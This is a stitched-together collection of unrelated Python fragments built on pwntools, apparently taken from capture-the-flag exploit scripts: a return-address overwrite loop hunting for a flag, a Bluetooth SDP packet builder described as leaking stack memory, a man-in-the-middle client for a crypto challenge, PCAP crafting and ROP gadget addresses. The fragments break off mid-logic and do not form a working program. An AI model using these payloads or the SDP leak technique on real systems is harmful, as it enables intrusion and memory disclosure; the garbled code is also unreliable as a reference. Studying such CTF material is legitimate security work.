def init():
global s_lumin_ac_tree
global s_lumin_dc_tree
global s_chrom_ac_tree
global s_chrom_dc_tree
s_lumin_ac_tree = []
for length, code in s_lumin_ac:
if length != 0:
tmp = bitarray.bitarray()
tmp.frombytes(pwn.p16(code, endian='big'))
tmp = tmp[-length:]
s_lumin_ac_tree.append(tmp)
else:
s_lumin_ac_tree.append(bitarray.bitarray())
s_lumin_dc_tree = []
for length, code in s_lumin_dc:
if length != 0:
tmp = bitarray.bitarray()
tmp.frombytes(pwn.p16(code, endian='big'))
tmp = tmp[-length:]
s_lumin_dc_tree.append(tmp)
else:
s_lumin_dc_tree.append(bitarray.bitarray())
s_chrom_ac_tree = []
for length, code in s_chrom_ac:
if length != 0:
tmp = bitarray.bitarray()
tmp.frombytes(pwn.p16(code, endian='big'))
tmp = tmp[-length:]
s_chrom_ac_tree.append(tmp)
else:
s_chrom_ac_tree.append(bitarray.bitarray())
s_chrom_dc_tree = []
for length, code in s_chrom_dc:
if length != 0:
tmp = bitarray.bitarray()
tmp.frombytes(pwn.p16(code, endian='big'))
tmp = tmp[-length:]
s_chrom_dc_tree.append(tmp)
else:
s_chrom_dc_tree.append(bitarray.bitarray())
def detect_segfault(canary):
ofs = 16
while True:
#payload = pwn.fit({ofs: pwn.p16(pwn.ELF(remote_binary, False).sym["display_flag"])}, filler='B')
payload = b"A" * ofs + pwn.p16(
pwn.ELF(remote_binary, False).sym["display_flag"])
rsp = send_payload(canary, payload)
if "pico" in rsp.lower():
print(rsp)
break
def construct_packet(service, continuation_state):
"""
Construct a SDP message for `service` and continuation state `continuation_state`.
This package can be used to trigger the vulnerability in order to get memory
from the stack.
Params:
- `service` - Service ID for the package
- `continuation_state` - Continuation state for the package. For the
exploit to work this should be the continuation state of a
response received by SDP for another service.
Returns:
Valid SDP package for the specified service ID.
"""
pkt = '\x02\x00\x00'
pkt += pwn.p16(7 + len(continuation_state))
pkt += '\x35\x03\x19'
pkt += pwn.p16(service)
pkt += '\x01\x00'
pkt += continuation_state
return pkt
#!/usr/bin/python3
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
from Crypto.Util.number import long_to_bytes
import pwn
import re
HOST = 'crypto-mitm.ctfz.one'
client = pwn.remote(HOST, 3338)
server = pwn.remote(HOST, 3339)
length = pwn.u16(client.recvn(2))
client.recvn(length)
server.send(pwn.p16(37))
server.send('ClientHello:SHA_AES_CTR_RSA_DHE_2048\n')
length = pwn.u16(server.recvn(2))
data = server.recvn(length)
s = pwn.process('./solve')
private_key = int(s.recvline().strip(), 16)
regex = 'ServerHello:'
regex += 'p=(?P<p>[0-9a-f]+)\|'
regex += 'g=(?P<g>[0-9a-f]+)\|'
regex += 'A=(?P<A>[0-9a-f]+)\|'
regex += 's=(?P<s>[0-9a-f]+)\|'
regex = re.compile(regex)
import pwn
import time
import scapy.all
# PCAP Header crafting
pcap = ""
pcap += pwn.p32(0xa1b2c3d4) # PCAP magic
pcap += pwn.p16(2) # PCAP 2.4
pcap += pwn.p16(4)
pcap += pwn.p32(0) # UTC
pcap += pwn.p32(0) # sigfigs
pcap += pwn.p32(65535) # caplen
pcap += pwn.p32(1) # ethernet
# Helper function to populate packet headers in PCAP file
def add_packet_header(sl, l):
global pcap
pcap += pwn.p32(int(time.time()))
pcap += pwn.p32(0)
pcap += pwn.p32(sl)
pcap += pwn.p32(l)
## ROP Gadgets
# 0x00402083: pop rdi ; ret ; (1 found)
POP_RDI = 0x00402083
# 0x00402081: pop rsi ; pop r15 ; ret ; (1 found)
POP_RSI_R15 = 0x00402081
# 0x0040207d: pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret ; (1 found)
POP_RSP = 0x0040207d
def _create_hszf_header(payload, sender, reciever):
return pwn.p32(len(payload) + 2, endian='big') + pwn.p16(
1, endian='big') + pwn.p8(sender) + pwn.p8(reciever)